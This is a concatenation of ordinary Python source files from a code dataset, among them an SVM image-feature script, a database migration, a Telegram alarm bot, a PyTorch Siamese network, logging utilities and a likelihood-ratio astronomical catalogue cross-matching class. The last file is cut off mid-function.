loader=roidbSampleHOG,\n transform=None)\n \n print('this is the annocount', annoCount)\n\n l_feat,l_idx,y = extract_pyroidb_features(pyroidb, 'hog', clsToSet,\\\n spatial_size=(32, 32),hist_bins=32, \\\n orient=9, pix_per_cell=8, cell_per_block=2, \\\n hog_channel=0)\n\n train_size = 300\n test_size = 300\n\n\n X_train, X_test, y_train, y_test, X_idx = split_data(train_size, test_size, \\\n l_feat,l_idx, y,\\\n clsToSet)\n print(X_train.shape)\n print(y_train.shape)\n\n if args.model is not None:\n model = pickle.load(open(args.model,\"rb\"))\n else:\n model = train_SVM(X_train,y_train)\n pickle.dump(model,open(iconicImagesFileFormat().format(\"model.pkl\"),\"wb\"))\n\n # print(\"accuracy on test data {}\".format(model.score(X_test,y_test)))\n\n \"\"\"\n -> below is the raw output for x_test; we want the max \"k\" values \n from each dataset (along the columns) from ~1000 images of each dataset\n -> a good \"k\" is 10\n -> print the image paths to a file\n -> use the format given below\n -> TODO: write the \"findMaxRegions\" function in \"hog_svm.py\"\n \"\"\"\n\n # rawOutputs = np.matmul(model.coef_,npt(X_test)) + model.intercept_[:,np.newaxis]\n rawOutputs = model.decision_function(X_test)\n\n print(rawOutputs)\n print(rawOutputs.shape)\n \n fileDir = cfg.PATH_TO_NTD_OUTPUT\n if not osp.exists(fileDir):\n os.makedirs(fileDir)\n \n fileName = osp.join(fileDir,\\\n \"{}_{}_{}.txt\".format(setID,repeat,size))\n topK = 10\n fn = open(fileName,\"w\")\n maxRegionsStr = findMaxRegions(topK,pyroidb,rawOutputs,X_idx,clsToSet)\n fn.write(maxRegionsStr)\n fn.close()\n \n \n '''\nargparse.ArgumentParser:\nInput: (description='create the mixture datasets.'), Output: parser\n\nnp.zeros\nInput: (size), Output: areas\n\nnp.zeros\nInput: (size), Output: width\n \nnp.zeros\nInput: (size), Output: heights\n\nload_mixture_set\nInput: (setID,repeat,size), Output: roidb, annoCount\n\ncomputeTotalAnnosFromAnnoCount\n Input: (annoCount), Output: numAnnos\n\nget_bbox_info\nInput: roidb, numAnnos, Output: areas, widths, heights\n\n\npyroidb = RoidbDataset\nInput: (roidb,[0,1,2,3,4,5,6,7], loader=roidbSampleHOG, transform=None), Output: pyroidb\n\nextract_pyroidb_features\nInput: (pyroidb, 'hog', clsToSet,\\spatial_size=(32, 32),hist_bins=32, \\orient=9, pix_per_cell=8, cell_per_block=2, \\hog_channel=0)\nOutput: l_feat,l_idx,y\n\ntrain_SVM\nInput: (X_train,y_train), Output: model\n\nnp.matmul\nInput: (model.coef_,npt(X_test)) + model.intercept_.shape)\nOutput: rawOutputs\n\n osp.join\nInput: (cfg.PATH_TO_NTD_OUTPUT,\\\n \"{}_{}_{}.txt\".format(setID,repeat,size))\nOutput: fileName\n\nopen\nInput: (fileName,\"r\"),\nOutput: fn\n'''\n \n","sub_path":"tools/iconicImagesHOG.py","file_name":"iconicImagesHOG.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159340949","text":"\"\"\"change user.email to joined_at\n\nRevision ID: 63b7e055decf\nRevises: 0d18e7e5d6d4\nCreate Date: 2020-10-27 02:16:15.229659\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '63b7e055decf'\ndown_revision = '0d18e7e5d6d4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_column('email')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('email', sa.VARCHAR(length=50), nullable=True))\n\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/63b7e055decf_change_user_email_to_joined_at.py","file_name":"63b7e055decf_change_user_email_to_joined_at.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24023713","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport sys\n\nimport mysql.connector as mysql\nimport telegram\nimport influx\nfrom mysql.connector import errorcode\n\nfrom base import Session\nfrom user import User\nfrom alarm import Alarm\nfrom log import Log\n\nwith open(os.path.join(sys.path[0], \"config.json\"), \"r\") as f:\n jsondata = json.load(f)\n token = jsondata[\"token\"]\nf.close()\n\n\ndef add_user(username, chat_id):\n if not Session().query(User).filter(User.chat_id == chat_id).first():\n user = User(username, chat_id)\n user.save()\n send_alarm_text(\"Neuer Benutzer {}\".format(username))\n return user\n\n\ndef is_user_blocked(chat_id):\n session = Session()\n user = Session().query(User).filter(User.chat_id == chat_id).first()\n session.close()\n return user.blocked\n\n\ndef get_alarm(id):\n session = Session()\n alarm = session.query(Alarm).filter(Alarm.id == id).first()\n session.close()\n return alarm\n\n\ndef get_alarm_by_message(message):\n session = Session()\n message = \"%{}%\".format(message)\n alarm = session.query(Alarm).filter(Alarm.message.like(message)).first()\n session.close()\n return alarm\n\n\ndef get_list_alarms():\n session = Session()\n alarms = session.query(Alarm).all()\n session.close()\n return alarms\n\n\ndef get_list_alarms_active():\n session = Session()\n alarms = session.query(Alarm).filter(Alarm.active).all()\n session.close()\n return alarms\n\n\ndef get_list_alarms_inactive():\n session = Session()\n alarms = session.query(Alarm).filter(Alarm.active == False).all()\n session.close()\n return alarms\n\n\ndef get_user_by_name(name):\n session = Session()\n name = \"%{}%\".format(name)\n user = session.query(User).filter(User.name.like(name)).first()\n session.close()\n return user\n\n\ndef get_list_users():\n session = Session()\n users = session.query(User).all()\n session.close()\n return users\n\n\ndef get_list_user_active():\n session = Session()\n users = session.query(User).filter(User.active).filter(User.blocked).all()\n session.close()\n return users\n\n\ndef get_list_user_inactive():\n session = Session()\n users = session.query(User).filter(User.active == False).all()\n session.close()\n return users\n\n\ndef log_alarm(alarm):\n log = Log(alarm)\n log.save()\n\n\ndef send_alarm(alarm):\n log_alarm(alarm)\n send_alarm_text(alarm.message)\n\n\ndef send_alarm_text(text):\n for user in get_list_user_active():\n send(text, user)\n\n\ndef send(msg, user):\n bot = telegram.Bot(token=token)\n bot.sendMessage(chat_id=user.chat_id, text=msg)\n\n\ndef send_alarm_activated(alarm):\n if alarm.active:\n send_alarm(alarm)\n influx.logAlarm(alarm.message)\n\n\ndef get_last_alarm():\n session = Session()\n log = session.query(Log).order_by(Log.time.desc()).first()\n session.close()\n return log\n","sub_path":"roboteralarm.py","file_name":"roboteralarm.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28639424","text":"número = int(input('Digite um número inteiro: '))\nprint('''Escolha uma das bases para conversão:\n[ 1 ] converter para BINÁRIO\n[ 2 ] converter para OCTAL\n[ 3 ] converter para HEXADECIMAL''')\nopçãoDeConversão = int(input('Sua opção: '))\nif opçãoDeConversão == 1:\n print('{} convertido para BINÁRIO é igual a {}.'.format(número, bin(número)[2:]))\nelif opçãoDeConversão == 2:\n print('{} convertido para OCTAL é igual a {}.'.format(número, oct(número)[2:]))\nelif opçãoDeConversão == 3:\n print('{} convertido para OCTAL é igual a {}.'.format(número, hex(número)[2:]))\nelse:\n print('Opção inválida. Tente novamente.')\n","sub_path":"Exerciciospython2/Condicoes Aninhadas/e037.py","file_name":"e037.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606464590","text":"\"\"\" Tests for `yatsm.gis.projections`\n\"\"\"\nimport pytest\n\nfrom yatsm.gis import projections\n\n\nparams = {\n 5070: {'datum': 'NAD83',\n 'lat_0': '23',\n 'lat_1': '29.5',\n 'lat_2': '45.5',\n 'lon_0': '-96',\n 'proj': 'aea',\n 'units': 'm',\n 'x_0': '0',\n 'y_0': '0'},\n 32619: {'datum': 'WGS84', 'proj': 'utm', 'units': 'm', 'zone': '19'},\n 4326: {'datum': 'WGS84', 'proj': 'longlat'},\n 3857: {'a': '6378137',\n 'b': '6378137',\n 'k': '1.0',\n 'lat_ts': '0.0',\n 'lon_0': '0.0',\n 'nadgrids': '@null',\n 'proj': 'merc',\n 'units': 'm',\n 'x_0': '0.0',\n 'y_0': '0'},\n 6491: {'ellps': 'GRS80',\n 'lat_0': '41',\n 'lat_1': '42.68333333333333',\n 'lat_2': '41.71666666666667',\n 'lon_0': '-71.5',\n 'proj': 'lcc',\n 'units': 'm',\n 'x_0': '200000',\n 'y_0': '750000'}\n}\n\n\n@pytest.mark.parametrize(('code', 'params'), list(params.items()))\ndef test_crs_parameters(code, params):\n _params = projections.crs_parameters(code)\n assert _params == params\n\n\n@pytest.mark.parametrize('code', [-9999, 0])\ndef test_crs_parameters_fail(code):\n with pytest.raises(ValueError) as exc:\n projections.crs_parameters(code)\n assert 'Cannot find EPSG code' in str(exc)\n","sub_path":"tests/gis/test_gis_projections.py","file_name":"test_gis_projections.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195063188","text":"# coding: utf-8\n\nimport logging\nimport logging.config\nfrom logging import (\n INFO, getLogger, getLevelName\n)\nimport time\n\nimport simplejson as json\n\nclass SensitiveDataFilter(logging.Filter):\n\n def filter(self, record):\n msg = record.msg\n try:\n message = json.loads(msg)\n except (ValueError, TypeError):\n pass\n else:\n mask_sensitive(message)\n record.msg = json.dumps(message)\n return True\n\n\ndef init_logger(app):\n logging.config.dictConfig(app.config['LOGGING'])\n\n\ndef send_log(logger_name, data, log_level=INFO):\n if isinstance(log_level, str):\n log_level = getLevelName(log_level)\n\n _logger = getLogger(logger_name)\n\n message = json.dumps(data)\n _logger.log(log_level, message, extra=data)\n\n\ndef dump_request():\n from flask import request, g\n\n data = {\n 'method': request.method,\n 'host': request.host,\n 'path': request.path,\n 'remote_addr': request.headers.get('X-Real-IP', '') or request.remote_addr,\n 'elapse_time': int((time.time() - g.start) * 1000),\n 'status_code': g.status_code,\n 'request_id': g.request_id,\n 'session': g.session\n }\n\n req_args = getattr(request, 'values', 'json')\n if req_args:\n req_args = {k: v for k, v in req_args.items()}\n else:\n req_args = {}\n data.update(req_args=req_args, resp_data=g.resp_data)\n\n return data\n\n\ndef log_request():\n req_data = dump_request()\n send_log('ots', req_data)\n\n\ndef mask_sensitive(d):\n for k, v in d.iteritems():\n if isinstance(v, dict):\n mask_sensitive(v)\n else:\n FILEDS = ('password', 'id_card', 'id_no', 'delta')\n MASK = '*' * 8\n if k in FILEDS and v:\n d[k] = MASK\n","sub_path":"gapi/app/libs/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627336743","text":"import torch.nn as nn\nimport torch\n\nimport numpy as np\n\n__all__ = ['SiameseNetwork']\n\nclass BranchNetwork(nn.Module):\n \"\"\"\n Brach network\n \"\"\"\n def __init__(self):\n \"\"\"\n Input image size 180 x 320 (h x w)\n \"\"\"\n super(BranchNetwork, self).__init__()\n layers = []\n in_channels = 1\n layers += [nn.Conv2d(in_channels, 4, kernel_size=7, stride=2, padding=3)]\n layers += [nn.LeakyReLU(0.1, inplace=True)]\n\n layers += [nn.Conv2d(4, 8, kernel_size=5, stride=2, padding=2), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(8, 16, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(16, 32, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(32, 16, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n self.network = nn.Sequential(*layers)\n self.fc = nn.Sequential(*[nn.Linear(6 * 10 * 16, 16)])\n\n def forward(self, x):\n x = self.network(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass SiameseNetwork(nn.Module):\n \"\"\"\n siamese network has left and right branches\n \"\"\"\n def __init__(self, network):\n super(SiameseNetwork, self).__init__()\n self.network = network\n\n def _forward_one_branch(self, x):\n x = self.network(x)\n x = x.view(x.shape[0], -1)\n\n # L2 norm in dimension 1 (each row)\n x = nn.functional.normalize(x, p=2)\n return x\n\n def forward(self, x1, x2):\n x1 = self._forward_one_branch(x1)\n x2 = self._forward_one_branch(x2)\n return x1, x2\n\n def feature(self, x):\n return self._forward_one_branch(x)\n\n def feature_numpy(self, x):\n feat = self.feature(x)\n feat = feat.data\n feat = feat.cpu()\n feat = feat.numpy()\n \n if len(feat.shape) == 4:\n # N x C x 1 x 1\n \n feat = np.squeeze(feat, axis=(2, 3))\n else:\n # N x C\n assert len(feat.shape) == 2\n return feat\n\n\ndef ut():\n from contrastive_loss import ContrastiveLoss\n branch = BranchNetwork()\n siamese_network = SiameseNetwork(branch)\n\n criterion = ContrastiveLoss(margin=1.0)\n\n N = 2\n x1 = torch.randn(N, 1, 180, 320)\n x2 = torch.randn(N, 1, 180, 320)\n y1 = torch.randn(N, 1)\n y_zero = torch.zeros(N, 1)\n y_ones = torch.ones(N, 1)\n label = torch.where(y1 > 0, y_ones, y_zero)\n label = torch.squeeze(label)\n # print(label.shape)\n\n f1, f2 = siamese_network(x1, x2)\n print('f1 shape {}'.format(f1.shape))\n loss = criterion(f1, f2, label)\n print(loss)\n\nif __name__ == '__main__':\n ut()\n\n\n\n\n\n\n","sub_path":"Perspective Transformation/python_codes/deep/siamese.py","file_name":"siamese.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419137020","text":"# Make page a clearance page\n\n\ndef makePageClearance(make_page_clearance, inv_dict, inventory_write_IDs, IDs_on_site, new_ID, remove_page):\n for r in make_page_clearance:\n old = r\n new = old.replace('sale', '') + 'clearance'\n if new not in inv_dict:\n inv_dict[new] = []\n if new not in inventory_write_IDs:\n inventory_write_IDs.append(new)\n if new not in IDs_on_site:\n if old not in new_ID:\n new_ID.append(old)\n if old not in remove_page:\n remove_page.append(old)\n if new in remove_page:\n remove_page.remove(new)\n\n for s in inv_dict[old]:\n s[0] = new\n inv_dict[new].append(s)\n\n return inv_dict, inventory_write_IDs, new_ID, remove_page\n","sub_path":"makePageClearance.py","file_name":"makePageClearance.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46276069","text":"\n\"\"\"\nPython implementation of the likelihood ratio method for\ncross-matching two astronomical catalogues.\n\nReferences: Sutherland & Saunders, 1992; Georgakakis & Nandra 2011\n\nauthor: A.Ruiz & A.Georgakakis\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom io import open\n\nimport os\nfrom copy import deepcopy\n\ntry:\n # python 3\n from contextlib import redirect_stdout\nexcept:\n # python 2\n from contextlib2 import redirect_stdout\n\nfrom astropy import log\nfrom astropy import units as u\nfrom astropy.table import Table, Column, join, vstack, unique\nimport numpy as np\n\nfrom .priors import Prior #, BKGpdf\nfrom .priorsND import PriorND, BKGpdf\nfrom .match import BaseMatch\n\nimport sys\n\n\nclass LRMatch(BaseMatch):\n \"\"\"\n This class defines a crossmatching of two catalogues. It is initialized\n by passing two ``Catalogue`` objects:\n one for the primary catalogue (e.g. a list of X-ray sources) and another\n one for the secondary catalogue (e.g. a list of optical sources). The\n secondary catalogue must contain auxiliary data (e.g. magnitudes).\n\n Parameters\n ----------\n pcat : ``Catalogue``\n Primary catalogue.\n scat : ``Catalogue``\n Secondary catalogue.\n \"\"\"\n\n _lr_all = None\n _bkg = None\n _cutoff_column = 'LR_BEST'\n\n ### Class Properties\n @property\n def lr(self):\n if self._lr_all is None:\n raise AttributeError('Match has not been performed yet!')\n else:\n return self._lr_all\n\n @property\n def bkg(self):\n if self._bkg is None:\n raise AttributeError('Match has not been performed yet!')\n else:\n return self._bkg\n\n @property\n def scat(self):\n return self.scats[0]\n\n ### Public Methods\n def run(self,\n radius=6*u.arcsec,\n mags=None,\n magmin=10.0,\n magmax=30.0,\n magbinsize=0.5,\n priors=None,\n prior_method='random',\n random_numrepeat=200,\n poserr_dist=\"rayleigh\",\n prob_ratio_secondary=0.5,\n seed=None \n ):\n \"\"\"\n Performs the actual LR crossmatch between the two catalogues. The\n method identifies all possible counterparts of the primary catalogue\n in the secondary catalogue within `radius` and estimates the\n corresponding LR for each counterpart in each available magnitude.\n\n Parameters\n ----------\n radius : Astropy ``Quantity``, optional\n Distance limit for searching counterparts in the secondary\n catalogue in angular units. Defaults to 6 arcsec.\n mag: \n magmin : `float`, optional\n Lower magnitude limit to be considered in the LR calculation.\n Defaults to 10.0.\n magmax : `float`, optional\n Upper magnitude limit to be considered in the LR calculation.\n Defaults to 30.0.\n magbinsize : `float`, optional\n Magnitude bin width when estimating magnitude distributions.\n Defaults to 0.5.\n prob_ratio_secondary : `float`, optional\n Minimum probability ratio between best and other matchs for a\n primary source to be considered as a secondary match.\n Defaults to 0.5.\n priors : ``PriorND`` object or `None`, optional\n Predefined Prior object to be used in the cross-match. It has to\n be defined consistently with the magnitudes of the secondary catalogue.\n If `None`, the method set in `prior_method` is used to build the priors.\n Defaults to `None`.\n prior_method : 'random' or 'mask', optional\n Method to be used in the prior estimation.\n The a priori probability is determined as follows. First, we estimate\n the magnitude distribution of the spurious matches and it is scaled\n to the area within which we search for counterparts. This is then\n subtracted from the magnitude distribution of all counterparts in the\n secondary catalogue to determine the magnitude distribution of the\n true associations.\n The 'mask' method removes all sources in the\n secondary catalogue within one arcmin of the positions of the\n primary sources. The magnitude distribution of the remaining sources,\n divided by the remaining catalogue area, corresponds to the\n probability distribution of a spurious match per magnitude and per\n square degree.\n The 'random' method generates a catalogue of random\n positions away from the primary sources and searchs for all available\n counterparts in the secondary catalogue. The magnitude distribution\n of these sources corresponds to the probability distribution of a\n spurious match.\n Defaults to 'random'.\n\n random_numrepeat : number of random realisations in the case of prior_method=random\n Defaults to 200.\n\n poserr_dist : \"rayleigh\" of \"normal\". Probability distribution that describes \n the radial distance of two sources with positional errors. Defauls to \"Rayleigh\"\n\n \"\"\"\n\n assert poserr_dist.lower() in ['normal', 'rayleigh'], \"xposerr_dist should be one of normal, rayleigh\"\n assert prior_method.lower() in ['random', 'mask'], \"prior_method should be one of random, mask\"\n \n \n\n self.poserr_dist= poserr_dist\n\n self.random_numrepeat = random_numrepeat\n\n \n if self.scat.mags is None:\n raise ValueError('Secondary catalogue must contain '\n 'auxiliary data (e.g. magnitudes).')\n self.radius = radius\n \n log.info('Searching for match candidates within {}...'.format(self.radius))\n mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n log.info('Calculating priors...') \n if not priors:\n self._priors = self._calc_priors(\n mcat_sidx, mags, magmin, magmax, magbinsize, prior_method, seed\n )\n else: \n self._priors = priors\n\n self._bkg = BKGpdf(self.scat, mags, magmin, magmax, magbinsize)\n log.info('Calculating likelihood ratios for match candidates...')\n\n\n if(len(mcat_pidx)>0 & len(mcat_sidx)):\n lr, self._lr_all = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n log.info('Sorting and flagging match results...')\n match = self._final_table(lr, prob_ratio_secondary)\n else:\n return None;\n\n\n return match\n\n # Override the BaseMatch method\n def stats(\n self,\n match,\n cutoffstep=0.01,\n mincutoff=-3,\n maxcutoff=1.0,\n plot_to_file=None,\n only_primary=True\n ):\n \"\"\"\n Calculates and store match statistics (completness and reliability)\n for a range of LR thresholds. This can be used later to select the\n optimal threshold.\n \"\"\"\n # parametrise common statistics/definitions that\n # quantify the reliability and completeness of\n # the cross-match.\n # Produce table with summary of results\n # also include some reference ...? (e.g. Luo et al 2010???)\n\n if only_primary:\n # We use only primary matches\n mask = match['match_flag'] == 1\n else:\n # All matches\n mask = match['ncat'] == 2\n\n lrdata = match[mask]\n\n stats = Table()\n stats['cutoff'] = np.arange(mincutoff, maxcutoff, cutoffstep)\n stats['completeness'] = np.nan\n stats['reliability'] = np.nan\n\n for i, lrlim in enumerate(stats['cutoff']):\n rel_good = lrdata['REL_BEST'][lrdata[self._cutoff_column] > 10**lrlim]\n #CHILR[i] = float(rel_good.size)/len(self.pcat) # sample completeness\n #stats['CHILR'][i] = np.sum(rel_good)/len(self.pcat) # completeness\n stats['completeness'][i] = float(rel_good.size)/len(lrdata) # completeness (AGE)\n stats['reliability'][i] = np.mean(rel_good) # reliability\n\n stats['error_rate'] = 1 - stats['reliability']\n stats['CR'] = stats['completeness'] + stats['reliability']\n\n if plot_to_file is not None:\n self._plot_stats(stats, plot_to_file)\n\n return stats\n\n # Overrides the BaseMatch method\n def stats_rndmatch(\n self,\n match,\n match_rnd,\n ncutoff=101,\n mincutoff=0.0,\n maxcutoff=10.0,\n plot_to_file=None\n ):\n \"\"\"\n Calculates match statistics (completness and reliability), using a\n random match, for a range of LR thresholds. This can be used later to\n select the optimal threshold.\n \"\"\"\n # TODO: LR ouput should be improved to simplify these selection masks\n mask = np.logical_and(match['ncat'] == 2, match['match_flag'] == 1)\n p_any0 = match[self._cutoff_column][mask]\n\n # Add sources with no matches\n size = len(np.where(match['ncat'] == 1)[0]) - len(p_any0)\n p_any0 = np.concatenate((np.array(p_any0), np.zeros(size)))\n\n mask = np.logical_and(match_rnd['ncat'] == 2, match_rnd['match_flag'] == 1)\n p_any0_offset = match_rnd[self._cutoff_column][mask]\n\n # Add sources with no matches\n size = len(np.where(match_rnd['ncat'] == 1)[0]) - len(p_any0_offset)\n p_any0_offset = np.concatenate(\n (np.array(p_any0_offset), np.zeros(size))\n )\n\n cutoffs = np.linspace(mincutoff, maxcutoff, num=ncutoff)\n\n stats = Table()\n stats['cutoff'] = cutoffs\n stats['completeness'] = [(p_any0 > c).mean() for c in cutoffs]\n stats['error_rate'] = [(p_any0_offset > c).mean() for c in cutoffs]\n stats['reliability'] = 1 - stats['error_rate']\n stats['CR'] = stats['completeness'] + stats['reliability']\n\n return stats\n\n ### Internal Methods\n def _candidates(self):\n \"\"\"\n Identify all possible counterparts for the primary sources in the\n secondary catalogue within `self.radius`.\n\n Returns\n -------\n pidx : numpy ``ndarray``\n Indexes of the primary sources with counterparts in the\n secondary catalogue.\n sidx : numpy ``ndarray``\n Indexes of the counterparts in the secondary catalogue.\n d2d : numpy ``ndarray``\n Distance between the primary source and the counterpart in the\n secondary catalogue.\n See the documentation of Astropy's ``search_around_sky`` tool for more\n details about the output.\n \"\"\"\n pcoords = self.pcat.coords\n scoords = self.scat.coords\n pidx, sidx, d2d, _ = scoords.search_around_sky(pcoords, self.radius)\n #print(pidx, sidx, ded)\n return pidx, sidx, d2d\n\n def _calc_priors(self, sidx, mags, magmin, magmax, magbinsize, method, seed):\n \"\"\"\n Estimates the prior probability distribution for a source in the\n primary catalogue having a counterpart in the secondary catalogue\n with magnitude m.\n\n The a priori probability is determined as follows. First, we estimate\n the magnitude distribution of the spurious matches and it is scaled\n to the area within which we search for counterparts. This is then\n subtracted from the magnitude distribution of all counterparts in the\n secondary catalogue to determine the magnitude distribution of the\n true associations.\n\n Parameters\n ----------\n sidx : numpy ``ndarray``\n Indexes of the counterparts in the secondary catalogue.\n mags: 'list' of catalogue column names or combination of them\n combinations are simply a 'list' of more than one\n names of catalogue columns\n magmin : `float`, optional\n Lower magnitude limit when estimating magnitude distributions.\n magmax : `float`, optional\n Upper magnitude limit when estimating magnitude distributions.\n magbinsize : `float`, optional\n Magnitude bin width when estimating magnitude distributions.\n method : 'random' or 'mask'\n Method for estimating the magnitude distribution of spurious\n matches. See the documentation of ``run`` method for details.\n\n Return\n ------\n priors : ``Prior``\n Object containing the magnitude probability distributions of \"true\"\n and \"spurious\" sources for each available magnitude in the\n secondary catalogue.\n \"\"\"\n #print(magmin, magmax, magbinsize)\n \n if method == 'mask':\n rndcat = False\n elif method == 'random':\n rndcat = self.pcat.randomise(numrepeat=self.random_numrepeat, seed=seed)\n else:\n raise ValueError('Unknown method: {}'.format(method))\n\n priors = PriorND(self.pcat, self.scat, rndcat, self.radius, mags, \n magmin, magmax, magbinsize, self.scat.mags[sidx])\n\n #priors.plot(\"prior0\")\n return priors\n\n def _likelihood_ratio(self, pidx, sidx, d2d):\n \"\"\"\n Estimates the likelihood ratio for all counterparts and for each\n magnitude band.\n\n Parameters\n ----------\n pidx : numpy ``ndarray``\n Indexes of the primary sources with counterparts in the\n secondary catalogue.\n sidx : numpy ``ndarray``\n Indexes of the counterparts in the secondary catalogue.\n d2d : numpy ``ndarray``\n Distance between the primary source and the counterpart in the\n secondary catalogue.\n\n Return\n ------\n lr : Astropy ``Table``\n Table with the likelihood ratios for each counterpart and each\n available magnitude in the secondary catalogue.\n \"\"\"\n pcat_idcol = 'SRCID_{}'.format(self.pcat.name)\n scat_idcol = 'SRCID_{}'.format(self.scat.name)\n drcol = 'Separation_{}_{}'.format(self.pcat.name, self.scat.name)\n\n lr = Table()\n lr[pcat_idcol] = self.pcat.ids[pidx]\n lr[scat_idcol] = self.scat.ids[sidx]\n lr[drcol] = d2d.to(u.arcsec)\n\n #print(self.pcat.ids[pidx])\n #print(self.scat.ids[sidx])\n #print(d2d.to(u.arcsec))\n\n # AGE: if cata has no ids it fails with lr['ncat']=2\n lr['ncat'] = [2] * len( lr[pcat_idcol] )\n lr['PEF'] = self._pos_err_function(d2d, pidx, sidx)\n\n #self._qnterms(lr, self.scat.mags[sidx])\n self._lrND(lr, self.scat.mags[sidx])\n\n # For estimating the reliability, the table has to be grouped.\n # Note that this changes the order of the rows!!!\n lr = lr.group_by(pcat_idcol)\n\n self._reliabilityND(lr)\n\n self._p_any_bestND(lr)\n lr_all = lr.copy()\n\n final_columns = [pcat_idcol, scat_idcol, drcol, 'ncat',\n 'LR_BEST', 'REL_BEST', 'LR_BEST_MAG',\n 'prob_has_match', 'prob_this_match',\n ]\n lr.keep_columns(final_columns)\n\n return lr, lr_all\n\n ### methods for _likelihood_ratio\n def _pos_err_function(self, radius, pidx, sidx):\n\n if(self.poserr_dist.lower()==\"normal\"):\n return self._pos_err_function_normal(radius, pidx, sidx)\n elif(self.poserr_dist.lower()==\"rayleigh\"):\n return self._pos_err_function_rayleigh(radius, pidx, sidx)\n else:\n raise ValueError('Unknown method: {}'.format(self.poserr_dist))\n\n \n def _pos_err_function_rayleigh(self, radius, pidx, sidx):\n # radius is offset between opt/xray counter in arcsec\n # I assume that the pos is Gaussian.\n # NOTE: This returns prob per square *arcsec* !!!!\n ppos_error = self.pcat.poserr[pidx].as_array()\n spos_error = self.scat.poserr[sidx].as_array()\n\n # Rayleigh\n sigma2 = ppos_error**2 + spos_error**2\n exponent = -radius**2 / sigma2 \n return np.exp(exponent) / sigma2 * 2 * radius\n \n \n def _pos_err_function_normal(self, radius, pidx, sidx):\n # radius is offset between opt/xray counter in arcsec\n # I assume that the pos is Gaussian.\n # NOTE: This returns prob per square *arcsec* !!!!\n ppos_error = self.pcat.poserr[pidx].as_array()\n spos_error = self.scat.poserr[sidx].as_array()\n\n # Gaussian\n sigma2 = ppos_error**2 + spos_error**2\n exponent = -radius**2 / (2*sigma2)\n\n return np.exp(exponent) / (2*np.pi*sigma2)\n \n\n def _lrND(self, lr_table, mags):\n\n # here the loop is over .priors.dict_prior.keys\n # then for each [name] I define arrays\n # I define tuples and the get the results from\n # the prior. \n \n for col in self._priors.prior_dict.keys():\n #print(col, self._priors.prior_dict.keys()\n qterm = self._priors.interp(mags, col)\n nterm = self._bkg.interp(mags, col)\n \n \n m = nterm ==0 \n lr_table['LR_' + col] = lr_table['PEF'] * qterm / nterm\n\n # if nterm == 0 then do not assign a lr\n lr_table['LR_' + col][m]=0.0\n \n #print(col, qterm, nterm)\n #for i in range(len(qterm)):\n # print(mags[i], qterm[i], nterm[i], lr_table['PEF'], lr_table['LR_'+col][i])\n \n\n def _reliabilityND(self, lr_table):\n group_size = np.diff(lr_table.groups.indices)\n\n \n\n QCAP = []\n for col in self._priors.prior_dict.keys():\n # Overall identification ratio\n q = self._priors.qcap(col)\n QCAP.append(q)\n\n # Add all values of LR for each group, i.e., all\n # matches for a source of the primary catalogue.\n sumlr = lr_table['LR_' + col].groups.aggregate(np.sum)\n #print(sumlr.shape)\n # The previous array has a length equal to the number of groups.\n # We need to rebuild the array having the same length as the\n # original table for using element-wise operations. We repeat\n # each element of sumlr as many times as the size of the\n # corresponding group\n sumlr = np.repeat(sumlr, group_size)\n #print(sumlr.shape)\n lr_table['REL_' + col] = lr_table['LR_' + col] / (sumlr + (1-q))\n\n # Probability that the primary source has a counterpart in magcol\n # i.e. the sum of reliabilities for all matches of a given source\n sumrel = lr_table['REL_' + col].groups.aggregate(np.sum)\n sumrel = np.repeat(sumrel, group_size)\n lr_table['p_any_' + col] = sumrel\n\n # Relative probability for a given counterpart\n lr_table['p_i_' + col] = (lr_table['REL_' + col] /\n lr_table['p_any_' + col])\n\n print(QCAP)\n #for g in lr_table.groups:\n # print(lr_table['LR_' + col])\n \n lr_table.meta['QCAP'] = str(QCAP)\n #lr_table.write(\"e.fits\", format='fits', overwrite=True)\n \n def _p_any_bestND(self, lr_table):\n pa_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n pi_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n lr_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n rel_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n\n names=[]\n for i, col in enumerate(self._priors.prior_dict.keys()):\n lr_array[:, i] = lr_table['LR_' + col]\n 